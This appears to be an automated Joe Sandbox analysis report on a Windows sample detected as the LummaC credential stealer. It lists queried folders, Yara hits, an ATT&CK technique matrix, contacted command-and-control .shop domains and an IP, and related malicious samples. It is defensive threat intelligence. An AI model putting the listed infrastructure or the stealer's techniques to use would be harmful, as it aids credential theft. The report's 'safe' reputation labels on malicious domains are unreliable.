Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior

Source: Yara match	File source: 00000000.00000003.1949210599.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1961272232.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1974922177.0000000002B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1974177524.0000000002B38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1949376652.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1973966010.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1961407186.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe PID: 7344, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe PID: 7344, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	11 Virtualization/Sandbox Evasion	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	31 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	22 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	45%	ReversingLabs	Win32.Spyware.Lummastealer
SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	Avira URL Cloud	safe
radiationnopp.shop	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://stationacutwo.shop/api8	0%	Avira URL Cloud	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	Avira URL Cloud	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
answerrsdo.shop	0%	Avira URL Cloud	safe
publicitttyps.shop	0%	Avira URL Cloud	safe
https://stationacutwo.shop/C	0%	Avira URL Cloud	safe
bargainnykwo.shop	0%	Avira URL Cloud	safe
benchillppwo.shop	0%	Avira URL Cloud	safe
bouncedgowp.shop	0%	Avira URL Cloud	safe
https://stationacutwo.shop/	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
https://support.microsof	0%	Avira URL Cloud	safe
bannngwko.shop	0%	Avira URL Cloud	safe
stationacutwo.shop	0%	Avira URL Cloud	safe
https://stationacutwo.shop/li	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.all	0%	Avira URL Cloud	safe
https://stationacutwo.shop/api	0%	Avira URL Cloud	safe
affecthorsedpo.shop	0%	Avira URL Cloud	safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
stationacutwo.shop	188.114.96.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
radiationnopp.shop	true	Avira URL Cloud: safe	unknown
publicitttyps.shop	true	Avira URL Cloud: safe	unknown
answerrsdo.shop	true	Avira URL Cloud: safe	unknown
benchillppwo.shop	true	Avira URL Cloud: safe	unknown
bargainnykwo.shop	true	Avira URL Cloud: safe	unknown
bouncedgowp.shop	true	Avira URL Cloud: safe	unknown
bannngwko.shop	true	Avira URL Cloud: safe	unknown
stationacutwo.shop	true	Avira URL Cloud: safe	unknown
https://stationacutwo.shop/api	false	Avira URL Cloud: safe	unknown
affecthorsedpo.shop	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950873125.0000000002B96000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stationacutwo.shop/api8	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1973966010.0000000002B16000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950873125.0000000002B96000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949596354.0000000004F28000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950873125.0000000002B96000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.6.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949596354.0000000004F28000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1924688180.0000000004F5C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1924688180.0000000004F5C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950583810.0000000005022000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stationacutwo.shop/C	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949210599.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949376652.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950873125.0000000002B96000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950873125.0000000002B96000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stationacutwo.shop/	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000002.2156517909.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1924065566.0000000002B18000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1973966010.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1961407186.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949596354.0000000004F28000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949596354.0000000004F28000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.microsof	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1924688180.0000000004F5E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1949596354.0000000004F28000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950583810.0000000005022000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925423708.0000000004F2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925738574.0000000004F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stationacutwo.shop/li	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1961272232.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1961407186.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1950873125.0000000002B96000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	stationacutwo.shop	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466390
Start date and time:	2024-07-02 21:23:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 34 Number of non-executed functions: 126
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Simulations

Behavior and APIs

Time	Type	Description
15:24:23	API Interceptor	8x Sleep call for process: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe modified
15:24:46	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	30Fqen2Bu3.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/TbaYPT0S/download
	30Fqen2Bu3.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/TbaYPT0S/download
	Vg46FzGtNo.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	000366cm.nyashka.top/phpflowergenerator.php
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	filetransfer.io/data-package/mHgyHEv5/download
	file.exe	Get hash	malicious	FormBook	Browse	www.cavetta.org.mt/yhnb/
	http://johnlewisfr.com	Get hash	malicious	Unknown	Browse	johnlewisfr.com/
	cL7A9wGE3w.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	445798cm.nyashka.top/ProviderEternalLinephpRequestSecurePacketprocessauthwordpress.php
	http://www.youkonew.anakembok.de/	Get hash	malicious	HTMLPhisher	Browse	www.youkonew.anakembok.de/cdn-cgi/challenge-platform/h/g/jsd/r/89b98144d9c843b7
	hnCn8gE6NH.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	yenot.top/providerlowAuthApibigloadprotectflower.php
	288292021 ABB.exe	Get hash	malicious	FormBook	Browse	www.oc7o0.top/2zff/?Hp=4L8xoD0W4Zo4sy87CvwWXXlmZfhaBYNiZZOBxyE5jHDJEgkxN8cq+PG6NIXzy1XRCqQIvL5VyJCknvUNNLKk6zzmBcbZOQR3Nr9VCMayuUBptQdoGcq8y485hKv0f5POEUdLprTAYpXY&5H=CtUlKhgP42a

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
stationacutwo.shop	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	The Siedenburg Group #24-051-553861 Project.pdf	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://gcc.dcv.ms/i8Kf7mgiA8	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://kawak.com.co	Get hash	malicious	Unknown	Browse	104.16.117.116
	pKqvOdh3Sv.elf	Get hash	malicious	Mirai, Moobot	Browse	1.3.233.104
	Informational-severity alert_ Creation of forwarding_redirect rule Case ID_FqJxoz8.eml	Get hash	malicious	Unknown	Browse	104.21.234.235
	https://glamis-house.com/?email=	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	44zg1cvu.msg	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	Solaris.exe	Get hash	malicious	Python Stealer, Discord Token Stealer, MicroClip, PySilon Stealer	Browse	162.159.135.232
	INVOICE [UNPAID ] ref-E8K18.html	Get hash	malicious	HTMLPhisher	Browse	104.21.18.210
	https://habitatfindlay-my.sharepoint.com/:b:/g/personal/foccoach2_habitatfindlay_org/Efd9ut08_wNMnOLBMA7XdjsBQXd-OgDD2WmMYOy1Rjhc-g?e=4%3aDYghKb&at=9&xsdata=MDV8MDJ8amFzb25zQHJvd21hcmsuY29tfGIzNzE0ODg3NjdkYjQzOTc2MWMxMDhkYzlhYzIxM2I2fGU3ODFmNDMxYjI1YTRhZDQ4MDYzYzQ2MGZhMGYwNTkyfDB8MHw2Mzg1NTU0MDU1NjQxOTI5Mjh8VW5rbm93bnxUV0ZwYkdac2IzZDhleUpXSWpvaU1DNHdMakF3TURBaUxDSlFJam9pVjJsdU16SWlMQ0pCVGlJNklrMWhhV3dpTENKWFZDSTZNbjA9fDB8fHw%3d&sdata=OWNqc1RDVVlGcnJqVDdDU3RuQ04ycUloTlFXcXNlMG00bXZwUVFpeUM1QT0%3d	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Informational-severity alert_ Creation of forwarding_redirect rule Case ID_FqJxoz8.eml	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Secured_Document.Docx	Get hash	malicious	Unknown	Browse	188.114.96.3
	invoicepast.pdf.lnk.mal.lnk	Get hash	malicious	ScreenConnect Tool	Browse	188.114.96.3
	710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Get hash	malicious	DBatLoader, Remcos	Browse	188.114.96.3
	6RVmzn1DzL.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Build.exe	Get hash	malicious	DBatLoader, Neshta	Browse	188.114.96.3
	F.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse	188.114.96.3
	1719859269.0326595_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig	Browse	188.114.96.3
	MOD_200.pdf.lnk	Get hash	malicious	Arc Stealer	Browse	188.114.96.3

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_4a6c55577aaedf8dddd3a286fa2779c4277b_c0c012cd_099ad559-0e01-4b7d-a504-7bb0194793d8\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0366353994383433
Encrypted:	false
SSDEEP:	96:b4F7LJ+sUhqihe7qiMfNQQXIDcQrc6vcE4cw32+HbHg/PB6Heao8Fa9SAjOyWM2s:sxV+Ai3iG0FriLjBJFPzuiFzZ24IO8f
MD5:	1C7C150CC22BD2B0FEE9FB6601BA821C
SHA1:	77669666FE3298631010D9660A1A159F56FD259B
SHA-256:	00A09B234FDB05D60682530FC3F14AA47B79CBAB315E45176388CD9205633A1E
SHA-512:	537F95508047291706CB61A830255B46096A7B72516D452474CFD53CAA65CE6264067E7ADA5C1DE3130D5AD94B8A449273B17AB7B6EF9A59D2BE10DD03DF455B
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.4.2.1.8.7.4.2.9.3.1.9.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.4.2.1.8.7.5.0.5.8.8.1.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.9.a.d.5.5.9.-.0.e.0.1.-.4.b.7.d.-.a.5.0.4.-.7.b.b.0.1.9.4.7.9.3.d.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.7.1.0.9.2.f.-.0.d.1.c.-.4.c.a.6.-.8.2.e.e.-.5.c.a.2.9.1.0.f.2.2.d.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.i.n.3.2...B.o.o.t.k.i.t.X.-.g.e.n...5.2.7.2...1.4.8.4.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.b.0.-.0.0.0.1.-.0.0.1.4.-.d.3.9.8.-.3.c.6.c.b.5.c.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.7.6.b.9.f.7.9.2.2.4.e.c.e.7.e.8.d.3.a.3.0.b.d.c.3.5.7.8.0.9.9.0.0.0.0.f.f.f.f.!.0.0.0.0.c.d.5.6.7.a.9.1.b.f.f.8.5.2.5.7.a.8.2.d.6.c.3.9.7.5.0.2.e.5.

